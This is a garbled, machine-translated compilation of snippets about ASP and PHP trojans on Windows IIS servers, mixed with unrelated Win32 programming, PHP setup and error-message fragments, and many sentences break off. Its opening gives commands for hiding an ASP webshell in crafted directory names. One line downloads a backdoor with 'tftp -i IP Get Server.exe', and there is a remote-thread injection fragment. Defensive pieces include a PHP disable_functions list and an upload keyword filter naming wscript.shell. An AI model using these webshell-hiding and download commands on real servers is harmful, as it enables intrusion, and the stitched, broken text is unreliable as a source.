1, the establishment of non-standard directory: mkdir images. \
Copy ASP Trojan to directory: Copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images. \news.asp
Accessing ASP Trojans via the Web: http://ip/images../news.asp?action=login
How to delete a nonstandard directory: RmDir images. \ s
2. iis in Windows resolves files in directories that end with. asp to achieve the purpose of hiding the back door of our own pages:
mkdir programme.asp
New 1.
For a friend who often surf the internet, the Trojan horse will not be unfamiliar, open a website, inexplicably run a trojan, although the "Internet Options" in the "security" settings, but the following code will not pop any information directly run the program, do not believe that follow me!
(Hint: just understand the technology and methods, do not do damage, Yexj00.exe is a windows2000 vulnerability scan
In general today, ASP Trojan often through the following four points to operate the server, so we just have to set all around to be able to from a
Before the use of IIS server webmaster a lot, especially for the ASP site, to prevent the ASP Trojan has become the site security of the most critical content.
In general today, ASP Trojan often through the following
Access via HTTP protocol
The use of a word trojan (I only listed 2 kinds):
1. Only database backup scenarios
When the database is backed up as an ASP file, there is no "compile error, missing script shutdown flag%>"
2) SA permission, usually first write a word, figure convenient. (Of course, direct tftp uploads pigeons run, that's quicker)
Tftp-i IP Get Server.exe
A word trojan
First of all know
The E
Win32 call system color dialog box, win32 call dialog box
Reference: http://blog.csdn.net/u013242177/article/details/50437358
First, you must include the commdlg. h header file. This is the header file of the general dialog box, including the file dialog box, color dialog box, and Print dialog box.
Then declare a CHOOSECOLOR variable and a COLORREF variable rgbLineColor to store the selected color.
stat
1. IIS6 installation is normal2.A. Unzip the php-5.2.1-Win32 and copy all the DLL files in it and all the DLL files in the ext folder to \ windows \ system32B. Copy the php.exe‑php-win.exe and PHP. ini-Dist files in the C: \ PHP Directory to c: \ windows;C. Change c: \ windows \ PHP. ini-Dist to PhP. ini, open it in notepad, and search by using the search function of notepad. Code:
Register_globals = off
, Change off to on;Search again Code: extens
Their differences: the former is in window format, and the latter is in command line form.
Conversion between the two:
Win32-> Console
On the Setting tab of the project, find the link option configuration and select general in the gategory column. In the project options column, find subsystem: Windows, and change it to subsystem: console. You 'd better select "general" on the C/C ++ tab, and then select "Preprocessor definetions, change _ WINDOWS
EndurerOriginal1Version
A netizen said that no matter what website he opened on his computer, the displayed pages were hxxp: // 218.*1 *. 1*4.170 vip1.htm and vip2.htm.
Hxxp: // 218.*1 *. 1*4.170/vip1.htm content is US-ASCII encoded. Download http://purpleendurer.ys168.com encoding decoding to US-ASCIIProgramThe obtained content contains the Javascript script.CodeThe function is to download the file 611.exe, save it as C:/Microsoft.com, and run it.
File Description: D:/test/611.exeAttribute:
compatible
The printer queue is full
There is no space on the server to store files waiting to be printed
Deleted files waiting to be printed
The specified network name is no longer available
Deny network access
Wrong network resource type
The network name could not be found
The name limit for the local computer network adapter card is exceeded
Network BIOS session limit exceeded
The remote server is paused or is in the process of booting
The computer has reached the maximum number of connectio
"Hacker aq" (Win32.Troj. onlineGame. aq.49152) This is a trojan program that steals "QQ", "QQGAME", and "westward journey 2" from customers' computers, this trojan finds the anti-virus software window by searching the window and sends a closed message to it to prevent the customer from detecting the virus.
"126 email theft" (
/usr/local/apache/htdocs. If the script needs to read files other than/usr/local/apache/htdocs, if the error is displayed, the following error occurs: Warning: open_basedir restriction in effect. file is in wrong directory in/usr/local/apache/htdocs/open. php on line 4 and so on.3. Prevent php trojans from reading and writing file directoriesIn php. in ini, disable_functions = passthru, exec, shell_exec, and system are followed by php file processing functions, including fopen, mkdir, rmdir, chm
Process file: diskman.exeProcess name: Troy TrojanDescription: diskman.exe is a Troy Trojan.Program.GenerallyC: \ Program Files \ common files \ sand \ diskman.exeAdd a "Universal Disk Manager" service item to the service.
The most disgusting thing is to write in the service description:"Monitor and monitor new generic disk drives and send volume information to the Logical Disk Manager Management Service for configuration. If the service is terminated, the dynamic disk status and configuration
cannot be run independently. It must be loaded through the trojan Releaser.2. The Trojan Releaser (win32.troj. pswwow. d.212133) releases the trojan and copies it to the root directory of the system disk. The hacker creates the trojan as a system service and leaves the foll
Most basic hiding: invisible forms + hidden files
Trojan Horse program in any case mysterious, but in the final Win32 platform is still a program. There are two common types of programs that are available under Windows:
1.win32 Applications (WIN32 application), such as QQ, office and so on, are among the ranks.
2.
PHP Web Trojan scanner code sharing, PHP Web Trojan Scanner
No nonsense. paste the Code directly.
The Code is as follows:
The above code is shared by the php web Trojan scanner code. This article is accompanied by a comment. If you do not understand it, please leave a message for me. I believe there are more than one implementation method, you are welcome to sha
Virus Trojan scan: Reverse Analysis of QQ Trojan Horse stealingI. Preface in this series of articles, if there are no special circumstances in the last part of Virus analysis, I will use reverse analysis to thoroughly analyze the target virus for readers. However, I used three articles (about 2500 words per article) for the previous "pandatv incense" virus to analyze only 1/3 of the virus, the core part of
thread code is placed in it VirtualAllocEx (Rphandle,null,cb,mem_commit,page_execute_readwrite); Writes the remote thread's code to the remote process's address space writeprocessmemory (RPHANDLE,REMOTETHR, (LPVOID) remote,cb,null); The parameters required by the remote thread are also written to the address space of the remote process writeprocessmemory (Rphandle,remotepar, (LPVOID) rp,cb,null); Create a remote monitoring thread CreateRemoteThread (rphandle,null,0, (Lpthread_start_rout
Trojan Horse program TROJAN-SPY.WIN32.AGENT.CFU
The sample program is a use of Delphi program, program using MEW 1.x shell attempt to evade signature scanning, length of 67,908 bytes, icon for Windows default icon, virus extension for EXE, the main way to spread the web page hanging horse, file bundle, hacker attacks.
Virus analysis
The sample program is activated to release the Systen.dll file to the%Sy
First determine the file size:
If File.filesize
After uploading the file to the server, determine the dangerous action characters in the user file:
Set MyFile = Server. CreateObject ("Scripting.FileSystemObject")
Set MyText = Myfile.opentextfile (FilePath, 1) ' reads text file
Stextall = LCase (mytext.readall)
mytext.close
Set MyFile = Nothing
sstr= ". getfolder|. createfolder|. deletefolder|. createdirectory|. deletedirectory|. SaveAs
|wscript.shell|script.encode|server.|.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.